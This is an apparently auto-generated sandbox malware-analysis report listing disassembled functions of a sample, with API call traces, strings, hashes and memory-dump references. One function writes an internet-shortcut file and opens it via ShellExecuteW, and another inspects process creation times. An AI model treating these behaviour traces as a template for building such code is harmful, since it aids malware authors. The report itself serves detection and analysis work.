                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                              • Instruction ID: 9a6409416eeb705eceba65978a0779fad2f4207e9901be747ec24c840f59f2a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14329F74E0020ADFDF18CF98C991AFEB7B6EF45304F184169D945AB355D632AE86CB80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006192A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2d2504f655f56aa42e03488300dccddcc1557c8dde6ddbccaca3de41fc4b4a4e
                                                                                                                                                                                                                              • Instruction ID: 2c9b22117592546dc3337bd17b060ac272ee7e6abe1e44480016dec1f5454db6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d2504f655f56aa42e03488300dccddcc1557c8dde6ddbccaca3de41fc4b4a4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93320321D29F414DD7279634CD32379A24AAFB73C4F19E727E81AB5EA9EB2984C34100
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060A915 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 748423e3210d9dc1d6cb05ffc94034212e4724d86ef45771965dfe40e4815da1
                                                                                                                                                                                                                              • Instruction ID: 0d6508ac65b09797bec4fb53d2556c344244121eee90d8b3ea70abf95ebb0a66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 748423e3210d9dc1d6cb05ffc94034212e4724d86ef45771965dfe40e4815da1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E178706907058FCB28CFA8C580AAFB7B3BF49390B25865DD4569B3D1D731AD82CB52
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                              • Instruction ID: bd85feb68196638b3455f6e143f9a347658572a45b47ffd6d438fc5d2aa152a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03515F72E00219AFDF18CF99C951AEEBBB2EF88310F598159E815AB341C7349E51CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00604920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                              • Instruction ID: 5cc4362624628fd24cf87f6d9628094aeea1890f73dfe166fc8d313500e6e36d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 851138F72C404243D63CC62EC5B46F7E397EBC632572D43BAC2818B7D8CA22A941D600
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                                                              • Instruction ID: 4ee6d0d8a9eead5b9d01ea18e5a00df6e8a83dc0f14e7988cdf8487195de58e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53E04672912228EBCB54DBD8D9049CAB2EEEB84B41B19049AB501D3611C270DE40D7D1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00612DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                                                              • Instruction ID: a2c0f4f9caeba07d5e2b514655c05765388db4f5cfb17c567efcc6c18c307458
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46C08C34801E0146CE2A8910EAB23E87356BF91782F88058CC4030BB46D51EACC3D721
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E6600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 005E667E
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E66D7
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E66E2
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E66FE
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,006249E5,000000FF), ref: 005E67DB
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,006249E5,000000FF), ref: 005E67E7
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,006249E5), ref: 005E682F
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,006249E5,000000FF), ref: 005E684A
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,006249E5), ref: 005E6867
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,006249E5,000000FF), ref: 005E6891
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 005E68D8
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 005E692A
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,006249E5,000000FF), ref: 005E695C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                                                                              • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                                                              • API String ID: 2199533872-3004881174
                                                                                                                                                                                                                              • Opcode ID: 81b7676b91e585808ab3ac9d3ef8dcb824450647278aad909a6bab04109ad830
                                                                                                                                                                                                                              • Instruction ID: d5a9d36b84cd083a20e7f86e8dba6e9c5b05ca169231b5bdece2996508bad123
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81b7676b91e585808ab3ac9d3ef8dcb824450647278aad909a6bab04109ad830
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EB13371904289AFEB24CF65CC86BEEBFB5FF64780F104118E584AB2C1D7705A09C7A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00602B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0063DD3C,00000FA0,?,?,00602B6A), ref: 00602B98
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00602B6A), ref: 00602BA3
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00602B6A), ref: 00602BB4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00602BC6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00602BD4
                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00602B6A), ref: 00602BF7
                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(0063DD3C,00000007,?,?,00602B6A), ref: 00602C13
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00602B6A), ref: 00602C23
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • SleepConditionVariableCS, xrefs: 00602BC0
                                                                                                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00602B9E
                                                                                                                                                                                                                              • WakeAllConditionVariable, xrefs: 00602BCC
                                                                                                                                                                                                                              • kernel32.dll, xrefs: 00602BAF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                              • Opcode ID: ad5718212c16303be35147e6a316f889680b1d4cc9628a4882017ba2c7c826d3
                                                                                                                                                                                                                              • Instruction ID: 1829a1b4655534ddf2348ec92f70edc9e96d6ed490d026dfd43714384e0c0d4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad5718212c16303be35147e6a316f889680b1d4cc9628a4882017ba2c7c826d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6401B1B0B86B22ABD7351F74BC1DE973B6BDF50B41B051811BD04D22E0DF70C8058AA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00605CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00605DAC
                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00605DCE
                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00605EDD
                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00605FAF
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00606033
                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 0060604E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 2123188842-393685449
                                                                                                                                                                                                                              • Opcode ID: 1219ce17d955f65c1bce30d6a425fe103a0d244005c396febbc5bd9e4bec7a72
                                                                                                                                                                                                                              • Instruction ID: aa49c1d5442d1e0de1e6293d391b515dd78cb36547f9b90f45445543a1c8cf65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1219ce17d955f65c1bce30d6a425fe103a0d244005c396febbc5bd9e4bec7a72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AB1693188060AEFCF1CDFA4C8819AFBBB6FF04310B14405AE8166B292D775DA61CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E4270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,FAB1B776,?,?,?), ref: 005E42D2
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,FAB1B776,?,?,?), ref: 005E42F3
                                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,FAB1B776,?,?,?), ref: 005E4326
                                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,FAB1B776,?,?,?), ref: 005E4337
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E4355
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E4371
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E4399
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E43B5
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E43D3
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E43EF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1711917922-0
                                                                                                                                                                                                                              • Opcode ID: 9663b6fae29fe438d9cff06efa8e402521883ff25b88c73deb7007954e49101c
                                                                                                                                                                                                                              • Instruction ID: 1bf176a445e40c97d275a6c78f5dff6b9ddadc678050ca867cbc0a7f7ea77444
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9663b6fae29fe438d9cff06efa8e402521883ff25b88c73deb7007954e49101c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D85199B0E01658EBDB14CF99C984BEEFFB5BF48710F244619E910BB280C77059458BA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FBBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FBBC4
                                                                                                                                                                                                                                • Part of subcall function 005F254E: __EH_prolog3.LIBCMT ref: 005F2555
                                                                                                                                                                                                                                • Part of subcall function 005F254E: std::_Lockit::_Lockit.LIBCPMT ref: 005F255F
                                                                                                                                                                                                                                • Part of subcall function 005F254E: std::_Lockit::~_Lockit.LIBCPMT ref: 005F25D0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                              • API String ID: 1538362411-2891247106
                                                                                                                                                                                                                              • Opcode ID: 835caa21ec51fc10632da54ffede21cca78165c5d467d3a077f790a73f4f3ec8
                                                                                                                                                                                                                              • Instruction ID: 34891947fbf50faf0136a5c27e030397c8fda067fb5860f6ef069e591c99d0df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 835caa21ec51fc10632da54ffede21cca78165c5d467d3a077f790a73f4f3ec8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1B1797650010EEAEF19DF68CD69EFE3FA9FB44300F144519FB06A6261D7398A10DB61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00600C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00600CA4
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::_Lockit.LIBCPMT ref: 005E92A0
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::_Lockit.LIBCPMT ref: 005E92C2
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::~_Lockit.LIBCPMT ref: 005E92EA
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::~_Lockit.LIBCPMT ref: 005E9422
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
